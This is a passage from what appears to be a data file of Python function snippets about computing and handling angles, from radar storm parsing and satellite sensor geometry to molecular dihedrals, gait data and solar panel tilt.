array.zeros((no_of_tubes+no_of_overlaps)*real_step)\n print 'Final values has len %d' % len(final_values)\n for stepno in range(no_of_tubes+no_of_overlaps):\n final_values[stepno*real_step:(stepno+1)*real_step] = tube_steps + tube_sep*stepno + ave_angles[stepno]\n return final_values", "def create_azimuthal_polarization(dim, rotation):\n theta_array = np.zeros((dim, dim))\n\n for i in range(np.size(theta_array, 0)):\n for j in range(np.size(theta_array, 1)):\n x = -dim / 2 + i\n y = -dim / 2 + j\n # perform roation\n th = math.pi*rotation/180.0\n x = np.cos(th)*x - np.sin(th)*y\n y = np.sin(th)*x + np.cos(th)*y\n\n rot = math.atan2(x, y) + math.pi/2\n # factor = (rot % (2*math.pi))\n theta_array[i][j] = (rot % (2 * math.pi))\n return theta_array", "def write_angles(self, polar_angles, azimuthal_angles):\n with self.entry.nxfile:\n if 'sample' not in self.entry:\n self.entry['sample'] = NXsample()\n if 'peaks' not in self.entry:\n self.entry['peaks'] = NXdata()\n else:\n if 'polar_angle' in self.entry['peaks']:\n del self.entry['peaks/polar_angle']\n if 'azimuthal_angle' in self.entry['peaks']:\n del self.entry['peaks/azimuthal_angle']\n self.write_parameter('peaks/polar_angle', polar_angles)\n self.write_parameter('peaks/azimuthal_angle', azimuthal_angles)", "def azimuth(poly):\n num = len(poly) - 1\n vec = unit_normal(poly[0], poly[1], poly[num])\n vec_azi = np.array([vec[0], vec[1], 0])\n vec_n = np.array([0, 1, 0])\n # update by Santosh\n # angle2vecs gives the smallest angle between the vectors\n # so for a west wall angle2vecs will give 90\n # the following 'if' statement will make sure 270 is returned\n x_vector = vec_azi[0]\n if x_vector < 0:\n return 360 - angle2vecs(vec_azi, vec_n)\n else:\n return angle2vecs(vec_azi, vec_n)", "def angles(self):\n self._sort_measurements()\n return self._angles", "def _parse_json(joint_states):\n json_f = [J for J in os.listdir(joint_states) if J.endswith('.json')]\n dfs = []\n for j in json_f:\n js = pd.read_json(f'{joint_states}/{j}')\n dfs.append(np.array([A['angle'] for A in js[js.columns[0]][0]['joint_angles']], dtype=float))\n return np.array(dfs)[:, :5]", "def really_process(txn, ctx):\n delete_prev_attrs(txn, ctx[\"nexrad\"])\n\n cenlat = float(ST[ctx[\"nexrad\"]][\"lat\"])\n cenlon = float(ST[ctx[\"nexrad\"]][\"lon\"])\n latscale = 111137.0\n lonscale = 111137.0 * math.cos(cenlat * math.pi / 180.0)\n\n # STM ID AZ/RAN TVS MESO POSH/POH/MX SIZE VIL DBZM HT TOP FCST MVMT\n co = 0\n for line in ctx[\"lines\"]:\n if len(line) < 5:\n continue\n if line[1] != \" \":\n continue\n tokens = line.replace(\">\", \" \").replace(\"/\", \" \").split()\n if not tokens or tokens[0] == \"STM\":\n continue\n if tokens[5] == \"UNKNOWN\":\n tokens[5] = 0\n tokens.insert(5, 0)\n tokens.insert(5, 0)\n if len(tokens) < 13:\n LOG.info(\"Incomplete Line ||%s||\", line)\n continue\n d = {}\n co += 1\n d[\"storm_id\"] = tokens[0]\n d[\"azimuth\"] = float(tokens[1])\n if tokens[2] == \"***\":\n LOG.info(\"skipping bad line |%s|\", line)\n continue\n d[\"range\"] = float(tokens[2]) * 1.852\n d[\"tvs\"] = tokens[3]\n d[\"meso\"] = tokens[4]\n d[\"posh\"] = tokens[5] if tokens[5] != \"***\" else None\n d[\"poh\"] = tokens[6] if tokens[6] != \"***\" else None\n if tokens[7] == \"<0.50\":\n tokens[7] = 0.01\n d[\"max_size\"] = tokens[7]\n\n if tokens[8] in [\"UNKNOWN\", \"***\"]:\n d[\"vil\"] = 0\n else:\n d[\"vil\"] = tokens[8]\n\n d[\"max_dbz\"] = tokens[9]\n d[\"max_dbz_height\"] = tokens[10]\n d[\"top\"] = tokens[11]\n if tokens[12] == \"NEW\":\n d[\"drct\"] = 0\n d[\"sknt\"] = 0\n else:\n d[\"drct\"] = int(float(tokens[12]))\n d[\"sknt\"] = tokens[13]\n d[\"nexrad\"] = ctx[\"nexrad\"]\n\n cosaz = math.cos(d[\"azimuth\"] * math.pi / 180.0)\n sinaz = math.sin(d[\"azimuth\"] * math.pi / 180.0)\n mylat = cenlat + (cosaz * (d[\"range\"] * 1000.0) / latscale)\n mylon = cenlon + (sinaz * (d[\"range\"] * 1000.0) / lonscale)\n d[\"geom\"] = \"SRID=4326;POINT(%s %s)\" % (mylon, mylat)\n d[\"valid\"] = ctx[\"ts\"]\n\n for table in [\n \"nexrad_attributes\",\n \"nexrad_attributes_%s\" % (ctx[\"ts\"].year,),\n ]:\n sql = f\"\"\"\n INSERT into {table} (nexrad, storm_id, geom, azimuth,\n range, tvs, meso, posh, poh, max_size, vil, max_dbz,\n max_dbz_height, top, drct, sknt, valid)\n values (%(nexrad)s, %(storm_id)s, ST_GeomFromEWKT(%(geom)s),\n %(azimuth)s, %(range)s, %(tvs)s, %(meso)s, %(posh)s,\n %(poh)s, %(max_size)s, %(vil)s, %(max_dbz)s,\n %(max_dbz_height)s, %(top)s, %(drct)s, %(sknt)s, %(valid)s)\n \"\"\"\n if common.dbwrite_enabled():\n txn.execute(sql, d)\n\n if co > 0:\n LOG.info(\n \"%s %s Processed %s entries\",\n ctx[\"nexrad\"],\n ctx[\"ts\"].strftime(\"%Y-%m-%d %H:%M UTC\"),\n co,\n )\n return co", "def test_calcAngles_angles_and_axis(self, kargs, expected_len_result, expected_first_angle, expected_first_axis):\n kargs['vsk'] = self.cal_SM\n angles, axis = pycgmCalc.calcAngles(self.motion_data, **kargs)\n np.testing.assert_equal(len(angles), expected_len_result)\n np.testing.assert_equal(len(axis), expected_len_result)\n np.testing.assert_almost_equal(angles[0][0], expected_first_angle, self.rounding_precision)\n np.testing.assert_almost_equal(axis[0][0], expected_first_axis, self.rounding_precision)", "def sensor_angles(self, channel=\"1\"):\n if channel != \"3B\":\n sensor = self.channel2sensor[channel]\n else:\n sensor = \"VNIRB\"\n\n # Angular data from ASTER metadata data.\n S = float(self.meta[\"MAPORIENTATIONANGLE\"])\n\n FOV = {\"VNIR\": 6.09, \"VNIRB\": 5.19, \"SWIR\": 4.9, \"TIR\": 4.9}\n\n P = {\n \"VNIR\": float(self.meta[\"POINTINGANGLE.1\"]),\n \"VNIRB\": float(self.meta[\"POINTINGANGLE.1\"]),\n \"SWIR\": float(self.meta[\"POINTINGANGLE.2\"]),\n \"TIR\": float(self.meta[\"POINTINGANGLE.3\"]),\n }\n\n # cut overlap area of backward pointing telescope\n if channel != \"3B\":\n field = self.read_digitalnumbers(channel)\n elif channel == \"3B\" and self.meta[\"FLYINGDIRECTION\"] == \"DE\":\n field = self.read_digitalnumbers(channel)[400:]\n elif channel == \"3B\" and self.meta[\"FLYINGDIRECTION\"] == \"AE\":\n field = self.read_digitalnumbers(channel)[:400]\n\n # design n field\n sidx = np.arange(np.shape(field)[1])\n\n mid0 = sidx[np.isfinite(field[5, :])][[0, -1]].mean()\n mid1 = sidx[np.isfinite(field[-5, :])][[0, -1]].mean()\n\n f = interpolate.interp1d(\n np.array([5, np.shape(field)[0] - 5]),\n np.array([mid0, mid1]),\n kind=\"linear\",\n fill_value=\"extrapolate\",\n )\n\n mids = f(np.arange(np.shape(field)[0]))\n # costructing an n-array indexing the pixels symmetric to the center of the\n # swath. If pointing angle is zero, the sensor zenith angle is zero in the\n # swath center.\n n = sidx - mids[:, np.newaxis]\n\n # left and right side of nadir are defined such that the sign follows the\n # roll angle sign, which is negative on the right and positive on the left\n # side of the sensor in flying direction (!), NOT in projected image. The\n # sides therefore depend on the ascending / decending mode defined in the\n # meta data.\n flyingdir = self.meta[\"FLYINGDIRECTION\"]\n if flyingdir is \"DE\":\n n *= -1\n\n swath_widths = np.sum(np.isfinite(field), axis=1)\n # average swath width, but exluding possible NaN-scanlines at beginning and\n # end of the image.\n swath_width = np.mean(swath_widths[swath_widths > 4200])\n\n n_angles = n * FOV[sensor] / swath_width + P[sensor]\n azimuth = np.full_like(field, np.nan)\n\n if channel != \"3B\":\n zenith = abs(n_angles)\n\n if flyingdir is \"DE\":\n azimuth[n_angles > 0] = 90 + S\n azimuth[n_angles <= 0] = 270 + S\n else:\n azimuth[n_angles < 0] = 90 + S\n azimuth[n_angles >= 0] = 270 + S\n else:\n h = 705000 # in km above the equator\n zenith = np.rad2deg(\n np.arctan(\n np.sqrt(\n (h * np.tan(np.deg2rad(P[sensor])) + 15 * n) ** 2\n + (h * np.tan(np.deg2rad(27.6)) / np.cos(np.deg2rad(P[sensor])))\n ** 2\n )\n / h\n )\n )\n\n x = np.rad2deg(np.arctan(0.6 / np.tan(np.deg2rad(n_angles))))\n if flyingdir is \"DE\":\n azimuth[n_angles > 0] = np.array(90 - x + S)[n_angles > 0]\n azimuth[n_angles <= 0] = np.array(270 - x + S)[n_angles <= 0]\n else:\n azimuth[n_angles < 0] = np.array(90 - x + S)[n_angles < 0]\n azimuth[n_angles >= 0] = np.array(270 - x + S)[n_angles >= 0]\n\n zenith[np.isnan(field)] = np.nan\n azimuth[np.isnan(field)] = np.nan\n\n return zenith, azimuth", "def sector_angles(self) -> np.ndarray:\n return self._sector_angles", "def check_angle_of_arcs(self):\n\n if self.thin_arc_start_angle >= 3600:\n self.thin_arc_start_angle %= 360\n self.thin_arc_start_angle += 360\n\n elif self.thin_arc_start_angle <= -3600:\n self.thin_arc_start_angle %= 360\n self.thin_arc_start_angle -= 360\n\n if self.thin_arc_end_angle >= 3600:\n self.thin_arc_end_angle %= 360\n self.thin_arc_end_angle += 360\n\n elif self.thin_arc_end_angle <= -3600:\n self.thin_arc_end_angle %= 360\n self.thin_arc_end_angle -= 360\n\n if self.thick_arc_start_angle >= 3600:\n self.thick_arc_start_angle %= 360\n self.thick_arc_start_angle += 360\n\n elif self.thick_arc_start_angle <= -3600:\n self.thick_arc_start_angle %= 360\n self.thick_arc_start_angle -= 360\n\n if self.thick_arc_end_angle >= 3600:\n self.thick_arc_end_angle %= 360\n self.thick_arc_end_angle += 360\n\n elif self.thick_arc_end_angle <= -3600:\n self.thick_arc_end_angle %= 360\n self.thick_arc_end_angle -= 360", "def get_node_angles(self, node_name, frame):\n channels = self.node_names[node_name][\"channels\"]\n euler_angles = []\n rotation_order = []\n for ch in channels:\n if ch.lower().endswith(\"rotation\"):\n idx = self.node_channels.index((node_name, ch))\n rotation_order.append(ch)\n euler_angles.append(frame[idx])\n return euler_angles, rotation_order", "def get_internal_angles(self):\n\n angles = []\n\n for elx, elz in zip(self.grid['x'], self.grid['z']):\n el_angles = []\n xy = np.vstack((elx, elz))\n for i in range(0, elx.size):\n i1 = (i - 1) % elx.size\n i2 = (i + 1) % elx.size\n\n a = (xy[:, i] - xy[:, i1])\n b = (xy[:, i2] - xy[:, i])\n # note that nodes are ordered counter-clockwise!\n angle = np.pi - np.arctan2(\n a[0] * b[1] - a[1] * b[0],\n a[0] * b[0] + a[1] * b[1]\n )\n el_angles.append(angle * 180 / np.pi)\n angles.append(el_angles)\n return np.array(angles)", "def calc_angles_struct(structure):\n if isinstance(structure,list):\n lig_angles = np.array(structure)[np.argsort(angs)[::-1]]\n else:\n mol = io_molecule.convert_io_molecule(structure)\n if len(mol.graph) == 0:\n print('Creating imputed molecular graph! May be untrustworthy.')\n mol.create_BO_dict()\n mets = mol.find_metals()\n lig_angles = []\n if len(mets) == 1:\n coordats = np.nonzero(mol.graph[mets[0]])[0]\n if len(coordats) == 1:\n lig_angles = []\n else:\n coords = mol.ase_atoms.get_positions()\n angs = [\n get_angle(coords[x[0]],coords[mets[0]],coords[x[1]]) for x in itertools.combinations(coordats,2)\n ]\n angs = np.array(angs)[np.argsort(angs)[::-1]] # Add angles\n lig_angles += angs.tolist() # Add sorted angles as features\n else:\n print('Warning: User ligand input without metal for refernce on interatomic angles. \\\n Please pass a structure with a metal for user ligand generation.')\n lig_angles += [0.0] * (36-len(lig_angles)) # Pad with zeros\n n_ca_m_ca_angles = len(np.nonzero(lig_angles)[0])\n denticity = denticity_combinations_dict[n_ca_m_ca_angles]\n return {'user_lig':np.array(lig_angles)}, denticity", "def rotationDetermination(self):\n \n for index, row in enumerate(self.magdata):\n if index > 11 and index < (len(self.magdata) - 12):\n br1 = [row[0] for row in self.magdata[(index-12):(index-2)]]\n bt1 = [row[1] for row in self.magdata[(index-12):(index-2)]]\n bn1 = [row[2] for row in self.magdata[(index-12):(index-2)]]\n b1 = np.matrix((np.mean(br1), np.mean(bt1), np.mean(bn1)))\n\n br2 = [row[0] for row in self.magdata[(index+2):(index+12)]]\n bt2 = [row[1] for row in self.magdata[(index+2):(index+12)]]\n bn2 = [row[2] for row in self.magdata[(index+2):(index+12)]]\n b2 = np.matrix((np.mean(br2), np.mean(bt2), np.mean(bn2)))\n\n theta = np.arccos(np.dot(b1,b2.T)/(np.linalg.norm(b1)*np.linalg.norm(b2)))*180/np.pi\n\n self.detections.rotations.append(theta[0,0])\n self.detections.rotationTimeTags.append(self.timestamps[index])\n \n\n## self.b1 = b1\n## self.b2 = b2\n self.detections.rotationBoundary=[]\n if len(self.detections.rotations) != 0:\n \n for index, theta in enumerate(self.detections.rotations):\n if index > 0:\n if theta > 30 and self.detections.rotations[index-1] < 30:\n self.detections.rotationBoundary.append(self.detections.rotationTimeTags[index])\n if index < len(self.detections.rotations)-1:\n if theta > 30 and self.detections.rotations[index+1] < 30:\n self.detections.rotationBoundary.append(self.detections.rotationTimeTags[index])", "def to_angles(self) -> np.ndarray:\n phi = np.arctan2(self.A[1, 2], self.A[2, 2]) # Roll Angle\n theta = -np.sin(self.A[0, 2]) # Pitch Angle\n psi = np.arctan2(self.A[0, 1], self.A[0, 0]) # Yaw Angle\n return np.array([phi, theta, psi])", "def read_area_shapes(path_ew, path_s):\n output = []\n\n with fiona.open(path_ew, 'r') as reader:\n for lsoa in reader:\n output.append({\n 'type': lsoa['type'],\n 'geometry': lsoa['geometry'],\n 'properties': {\n 'code': lsoa['properties']['LSOA11CD'],\n # 'LSOA11NM': lsoa['properties']['LSOA11NM'],\n }\n })\n\n with fiona.open(path_s, 'r') as reader:\n for datazone in reader:\n output.append({\n 'type': datazone['type'],\n 'geometry': datazone['geometry'],\n 'properties': {\n 'code': datazone['properties']['DataZone'],\n # 'LSOA11NM': lsoa['properties']['LSOA11NM'],\n }\n })\n\n return output", "def average_angle_for_box(n_detectors, n_detectors_middle, n_detectors_upper_lower):\n\n angles_for_middle_box = n_detectors[0:n_detectors_middle]\n middle_angle = sum(angles_for_middle_box) / len(angles_for_middle_box)\n\n angles_for_upper_lower_box = n_detectors[0:n_detectors_upper_lower]\n if len(angles_for_upper_lower_box) > 0:\n upper_lower_angle = sum(angles_for_upper_lower_box) / len(angles_for_upper_lower_box)\n else:\n upper_lower_angle = 0\n\n n_detectors = n_detectors[max(n_detectors_middle, n_detectors_upper_lower):]\n return middle_angle, upper_lower_angle, n_detectors", "def getAngles(self):\n try:\n return self._angleList\n except AttributeError:\n pass\n forceConstant=self._raw_data[\"ANGLE_FORCE_CONSTANT\"]\n angleEquil=self._raw_data[\"ANGLE_EQUIL_VALUE\"]\n anglePointers = self._raw_data[\"ANGLES_INC_HYDROGEN\"] \\\n +self._raw_data[\"ANGLES_WITHOUT_HYDROGEN\"]\n self._angleList=[]\n forceConstConversionFactor = (units.kilocalorie_per_mole/(units.radian*units.radian)).conversion_factor_to(units.kilojoule_per_mole/(units.radian*units.radian))\n for ii in range(0,len(anglePointers),4):\n if int(anglePointers[ii])<0 or \\\n int(anglePointers[ii+1])<0 or \\\n int(anglePointers[ii+2])<0:\n raise Exception(\"Found negative angle atom pointers %s\"\n % ((anglePointers[ii],\n anglePointers[ii+1],\n anglePointers[ii+2]),))\n iType=int(anglePointers[ii+3])-1\n self._angleList.append((int(anglePointers[ii])//3,\n int(anglePointers[ii+1])//3,\n int(anglePointers[ii+2])//3,\n float(forceConstant[iType])*forceConstConversionFactor,\n float(angleEquil[iType])))\n return self._angleList", "def get_angles(sides):\n return [get_angle(sides[1], sides[2], sides[0]),\n get_angle(sides[2], sides[0], sides[1]),\n get_angle(sides[0], sides[1], sides[2])]", "def _get_angle(ray_info, angle_step=None, scan_type=\"ppi\"):\n bin_to_deg = 360.0 / 65536.0\n\n def _extract_angles(data):\n angle = np.array(data * bin_to_deg, dtype=\"float64\")\n if scan_type == \"rhi\":\n ind = (angle > 225.0).nonzero()\n angle[ind] -= 360.0\n return angle\n\n try:\n angle_start = _extract_angles(ray_info[\"data\"])\n if angle_step is None:\n raise ValueError(\"Unknown angle step\")\n angle_stop = angle_start + angle_step\n except TypeError:\n angle_start = _extract_angles(ray_info[0][\"data\"])\n angle_stop = _extract_angles(ray_info[1][\"data\"])\n\n moving_angle = np.angle(\n (np.exp(1.0j * np.deg2rad(angle_start)) + np.exp(1.0j * np.deg2rad(angle_stop)))\n / 2.0,\n deg=True,\n )\n moving_angle[moving_angle < 0.0] += 360.0 # [0, 360]\n\n return moving_angle, angle_start, angle_stop", "def output_angles(frame, analysis_dict, reference):\n y_pos = 20\n for key, value in analysis_dict.items():\n if key in reference.keys():\n text = \"{}: Angle = {:.2f}, Diff = {:.2f}\".format(key, value, value - reference[key])\n cv2.putText(frame, text, (0, y_pos), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 0), 2,\n cv2.LINE_AA)\n cv2.putText(frame, text, (0, y_pos), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 255, 255), 1,\n cv2.LINE_AA)\n y_pos += 20\n return frame", "def parse_azimuth_elevation(filename):\n match = REGEX.match(filename)\n return int(match.group(1)), int(match.group(2))", "def test_calculate_angle():\n r1 = np.array([0, 0, -1])\n r2 = np.array([0, 0, 0])\n r3 = np.array([1, 0, 0])\n\n expected_angle = 90\n calculated_angle = molecool.calculate_angle(r1, r2, r3, degrees = True)\n\n assert expected_angle == calculated_angle", "def get_angles(self):\n if self.wavelength_control:\n return self.gonio_angles + self.wl_angles\n else:\n return self.gonio_angles", "def estimate_rotation(bounding_box):\n # x,y coord of topleft corner\n x,y,w,h = bounding_box\n rotation_arg = np.abs(1 - (h/float(w)))*2\n return rad_to_deg( np.arctan(rotation_arg) )", "def get_eangles(self):\n return self.eangles", "def leaf_azimuth(size=1, phyllotactic_angle=180, phyllotactic_deviation=15, plant_orientation=0, spiral=False):\n if size == 1:\n return plant_orientation\n if spiral:\n main = numpy.arange(0, size) * phyllotactic_angle\n else:\n it = cycle((0, phyllotactic_angle))\n main = numpy.array([it.next() for i in xrange(size)])\n azim = plant_orientation + main + (numpy.random.random(size) - 0.5) * 2 * phyllotactic_deviation\n azim = azim % 360\n return numpy.where(azim <= 180, azim, azim - 360)", "def calc_all_coord_atom_angles(core_geo):\n origin = np.array((0,0,0))\n angles = []\n for a,b in itertools.combinations(core_geo,2):\n angles.append(get_angle(a,origin,b))\n return np.array(sorted(angles))", "def readangles(filelist):\r\n filelen = len(filelist) - 2\r\n output = {'RightAnkleAngle': [], 'LeftAnkleAngle': [], 'Frames': {}}\r\n anglestart = filelen\r\n LeftStrike = []\r\n RightStrike = []\r\n events = 0\r\n for n in range(filelen):\r\n try:\r\n if filelist[n][0] == 'Model Outputs':\r\n anglestart = n + 5\r\n elif filelist[n][0] == 'Events':\r\n events = 1\r\n elif filelist[n][2] == 'Walking Speed':\r\n output[filelist[n][1]+'Speed'] = float(filelist[n][3])\r\n elif filelist[n][2] == 'Foot Off' and events == 1:\r\n # Footoff frame in events\r\n output['Frames'].update({filelist[n][1]+'Foff' : int(float(filelist[n][3]) * 100)})\r\n elif filelist[n][2] == 'Stride Length':\r\n output[filelist[n][1]+'StrideLen'] = float(filelist[n][3])\r\n elif filelist[n][2] == 'Foot Strike': \r\n # Convert seconds to frames at 100Hz.\r\n if filelist[n][1] == 'Left':\r\n LeftStrike.append(int(float(filelist[n][3]) * 100))\r\n elif filelist[n][1] == 'Right':\r\n RightStrike.append(int(float(filelist[n][3]) * 100)) \r\n elif n >= anglestart:\r\n # List ankle abs angles, convert to float if possible\r\n try:\r\n output['LeftAnkleAngle'].append(float(filelist[n][2]))\r\n except ValueError:\r\n output['LeftAnkleAngle'].append(filelist[n][2])\r\n try:\r\n output['RightAnkleAngle'].append(float(filelist[n][101]))\r\n except ValueError:\r\n output['RightAnkleAngle'].append(filelist[n][101])\r\n except IndexError:\r\n continue\r\n sides = ['Left', 'Right']\r\n for side in sides:\r\n output['Frames'].update({side+'Start' : min(locals()[side+'Strike'])})\r\n output['Frames'].update({side+'End' : max(locals()[side+'Strike'])})\r\n output.update(tableread(filelist,anglestart,output['Frames'],'Angle'))\r\n if anglestart == filelen:\r\n raise NameError('No angles in angle file!')\r\n for side in sides:\r\n mintoe = min(output[side[0]+'AnkleAnglesX'])\r\n midswingframe = int(output['Frames'][side+'Foff']/2 + output['Frames'][side+'End']/2 - output['Frames'][side+'Start'])\r\n output[side+'Clearance'] = output[side[0]+'AnkleAnglesX'][midswingframe] - mintoe\r\n #import pdb; pdb.set_trace()\r\n return output", "def angles(self):\n return self._angles", "def get_dihedral_angles(self):\n mol = self.m\n c1 = mol.GetConformer(-1)\n torsma = '[!$(*#*)&!D1]~[!$(*#*)&!D1]'\n q = Chem.MolFromSmarts(torsma)\n matches = mol.GetSubstructMatches(q)\n nmat = len(matches)\n dic = {}\n for match in matches:\n j = match[0]\n k = match[1]\n bond = mol.GetBondBetweenAtoms(j, k)\n aj = mol.GetAtomWithIdx(j)\n ak = mol.GetAtomWithIdx(k)\n hj, hk = [ _hyb[_a.GetHybridization()] for _a in [aj,ak] ]\n iok1 = ( hj not in [2,3] )\n iok2 = ( hk not in [2,3] )\n if iok1 or iok2: continue\n for b1 in aj.GetBonds():\n if (b1.GetIdx() == bond.GetIdx()):\n continue\n i = b1.GetOtherAtomIdx(j)\n for b2 in ak.GetBonds():\n if (b2.GetIdx() == bond.GetIdx()) or (b2.GetIdx() == b1.GetIdx()):\n continue\n l = b2.GetOtherAtomIdx(k)\n # skip 3-membered rings\n if (l == i):\n continue\n _dang = rdMolTransforms.GetDihedralDeg(c1, i,j,k,l)\n dang = abs(_dang)\n assert dang <= 180.0\n ias4 = (i,j,k,l)\n if not self.wH:\n if np.any([ self.zs[iaa]==1 for iaa in ias4 ]):\n continue\n if self.key in ['z']:\n #print('atsi=',ias4, 'zsi=', [_zs[iaa] for iaa in ias4])\n zi,zj,zk,zl = [ self.zs[iaa] for iaa in ias4 ]\n if (zj==zk and zi>zl) or (zj>zk):\n ias4 = (l,k,j,i)\n #torsions.append(ias4)\n #_zi,_zj,_zk,_zl = [ zs[_] for _ in ias4 ]\n #typez = '%d-%d-%d-%d'%(_zi,_zj,_zk,_zl)\n type4 = tuple([self.zs[iaa] for iaa in ias4])\n if type4 in list(dic.keys()):\n dic[type4] += [dang]\n else:\n dic[type4] = [dang]\n elif self.key in ['ia','i']:\n type4 = ias4\n dic[type4] = dang\n else:\n raise Exception('#unknown key')\n return dic", "def get_oas(user_settings, area_code):\r\n queryText2 = user_settings['url'] + \"/data/boundaries/oas_in_lad?lad_codes=\" + area_code\r\n\r\n response = requests.get(queryText2, auth=(user_settings['user'], user_settings['password']))\r\n\r\n i = 0\r\n # OAPolys = {}\r\n OA_Attributes = {}\r\n OANeigh_Dict = {}\r\n\r\n # 200 = successful\r\n if response.status_code == 200:\r\n\r\n jsonText = json.loads(response.text)\r\n\r\n for textLine in jsonText:\r\n i += 1\r\n poly = shapely.wkt.loads(textLine['geom'])\r\n\r\n OA_code = str(textLine['oa_code'])\r\n # OAPolys[OA_code] = poly\r\n OA_Attributes[OA_code] = textLine\r\n OANeigh_Dict[OA_code] = textLine['oa_neighbours']\r\n\r\n print(i, \" OAs loaded successfully\")\r\n return OA_Attributes, OANeigh_Dict, i\r\n\r\n else:\r\n logging.error(\"Error loading OAs from API. OA query response code is: \", response.status_code)\r\n print(\"Error loading OAs from API. OA query response code is: \", response.status_code)\r\n return \"Error loading OAs from API. OA query response code is: %s\" % response.status_code", "def search_base_angles(self, motor_positions):\n\n # Errore nelle soluzioni\n err = [0, 0, 0]\n\n # Angolo di inizio ricerca\n # Se gia' eseguita una conversione suo i valori precedenti\n if self.isLastAnglesValid:\n self.alpha_start = list(self.alpha)\n else:\n # Angolo minimo di partenza ( -alpha_limit )\n # TO_CHECK: perche' parto da una configurazione sicuramente errata? -10?\n self.alpha_start = [self.alpha_limit_r, self.alpha_limit_r, self.alpha_limit_r]\n\n # Angoli presunti\n # self.temp = list(self.alpha_start)\n alpha = list(self.alpha_start)\n\n # Altezze reali degli attuatori\n height = [self.real_height + motor_positions[0],\n self.real_height + motor_positions[1],\n self.real_height + motor_positions[2]]\n\n # Trovo il mediano tra 0-1-2\n '''\n if any([all([motor_positions[0] > motor_positions[1], motor_positions[0] < motor_positions[2]]),\n all([motor_positions[0] < motor_positions[1], motor_positions[0] > motor_positions[2]])]):\n is_0_median = True\n is_1_median = False\n is_2_median = False\n else:\n is_0_median = False\n if any([all([motor_positions[1] > motor_positions[2], motor_positions[1] < motor_positions[0]]),\n all([motor_positions[1] < motor_positions[2], motor_positions[1] > motor_positions[0]])]):\n is_0_median = False\n is_1_median = True\n is_2_median = False\n else:\n is_1_median = False\n if any([all([motor_positions[2] > motor_positions[1], motor_positions[2] < motor_positions[0]]),\n all([motor_positions[2] < motor_positions[1], motor_positions[2] > motor_positions[0]])]):\n is_0_median = False\n is_1_median = False\n is_2_median = True\n else:\n is_2_median = False\n '''\n\n # Incrementi degli angoli\n # TO_CHECK: perche' quattro? L'ultimo e' di backup?\n step_alpha_base = 0.1 * Kinematic.M_TO_RAD\n step_alpha = [step_alpha_base, step_alpha_base, step_alpha_base]\n\n # Numero di cicli eseguiti\n self.cycles = 0\n\n # Calcolo la condizione iniziale\n d1 = self.distance_12(alpha, height)\n err[0] = d1 - self.base_length\n step_alpha[1] = err[0] * self.ke * step_alpha_base\n\n d2 = self.distance_23(alpha, height)\n err[1] = d2 - self.base_length\n step_alpha[2] = err[1] * self.ke * step_alpha_base\n\n d3 = self.distance_13(alpha, height)\n err[2] = d3 - self.base_length\n step_alpha[0] = err[2] * self.ke * step_alpha_base\n\n i = 0\n while i < self.cycle_limit:\n\n i += 1\n\n # Incremento alfa1 ed azzero alfa2\n alpha[0] += step_alpha[0]\n alpha[1] = self.alpha_start[1]\n\n j = 0\n\n while j < self.cycle_limit:\n\n j += 1\n\n # self.next_iteration(alpha, step_alpha, i, j, n, err)\n self.cycles += 1\n\n if self.cycles > self.cycle_limit:\n logging.error(\"Maximum number of cycles executed, no solution found!\")\n return False\n\n # Incremento alfa1 ed azzero alfa2\n alpha[1] += step_alpha[1]\n\n # Se supero l'angolo limite\n # Partendo da -10 ( -0.17 ), non devo superare 10 ( 0.17 )\n if alpha[1] > -self.alpha_limit_r:\n\n # Angolo non trovato\n step_alpha[1] = step_alpha_base\n step_alpha[0] = err[0] * step_alpha_base * self.ke\n self.alpha_start[1] = -self.alpha_limit_r - 2 * step_alpha[1]\n break\n\n d1 = self.distance_12(alpha, height)\n err[0] = d1 - self.base_length\n step_alpha[1] = err[0] * self.ke * step_alpha_base\n\n if abs(err[0]) < self.err_limit:\n\n # Trovato il minimo\n self.alpha_start[1] = alpha[1]\n step_alpha[1] = step_alpha_base\n\n n = 0\n while n < self.cycle_limit:\n\n n += 1\n\n # self.next_iteration(alpha, step_alpha, i, j, n, err)\n self.cycles += 1\n\n if self.cycles > self.cycle_limit:\n logging.error(\"Maximum number of cycles executed, no solution found!\")\n return False\n\n alpha[2] += step_alpha[2]\n d2 = self.distance_23(alpha, height)\n err[1] = d2 - self.base_length\n step_alpha[2] = err[1] * self.ke * step_alpha_base\n\n if abs(err[1]) < self.err_limit:\n\n step_alpha[2] = step_alpha_base\n d3 = self.distance_13(alpha, height)\n err[2] = d3 - self.base_length\n step_alpha[0] = err[2] * self.ke * step_alpha_base\n\n if abs(err[2]) < self.err_limit:\n\n # Trovatas la soluzione\n self.alpha = list(alpha)\n return True\n\n # NEXT j!!!\n break\n\n # Next i!!!\n break", "def optimal_angle_and_tilt(sensors_metadata_clean, latitude, sun_properties, Max_Isol, panel_properties):\n # calculate panel tilt angle (B) for flat roofs (tilt < 5 degrees), slope roofs and walls.\n optimal_angle_flat = calc_optimal_angle(180, latitude, sun_properties.trr_mean) # assume surface azimuth = 180 (N,E), south facing\n sensors_metadata_clean['tilt']= np.vectorize(acos)(sensors_metadata_clean['Zdir']) #surface tilt angle in rad\n sensors_metadata_clean['tilt'] = np.vectorize(degrees)(sensors_metadata_clean['tilt']) #surface tilt angle in degrees\n sensors_metadata_clean['B'] = np.where(sensors_metadata_clean['tilt'] >= 5, sensors_metadata_clean['tilt'],\n degrees(optimal_angle_flat)) # panel tilt angle in degrees\n\n # calculate spacing and surface azimuth of the panels for flat roofs\n module_length = panel_properties['module_length']\n optimal_spacing_flat = calc_optimal_spacing(sun_properties, optimal_angle_flat, module_length)\n sensors_metadata_clean['array_s'] = np.where(sensors_metadata_clean['tilt'] >= 5, 0, optimal_spacing_flat)\n sensors_metadata_clean['surface_azimuth'] = np.vectorize(calc_surface_azimuth)(sensors_metadata_clean['Xdir'],\n sensors_metadata_clean['Ydir'],\n sensors_metadata_clean['B']) # degrees\n\n # calculate the surface area required to install one pv panel on flat roofs with defined tilt angle and array spacing\n if panel_properties['type'] == 'PV':\n module_width = module_length # for PV\n else:\n module_width = panel_properties['module_area']/module_length # for FP, ET\n module_flat_surface_area = module_width * (sensors_metadata_clean.array_s / 2 + module_length * cos(optimal_angle_flat))\n area_per_module = module_width * module_length\n\n # calculate the pv/solar collector module area within the area of each sensor point\n sensors_metadata_clean['area_installed_module'] = np.where(sensors_metadata_clean['tilt'] >= 5, sensors_metadata_clean.AREA_m2,\n area_per_module * (sensors_metadata_clean.AREA_m2 / module_flat_surface_area))\n\n # categorize the sensors by 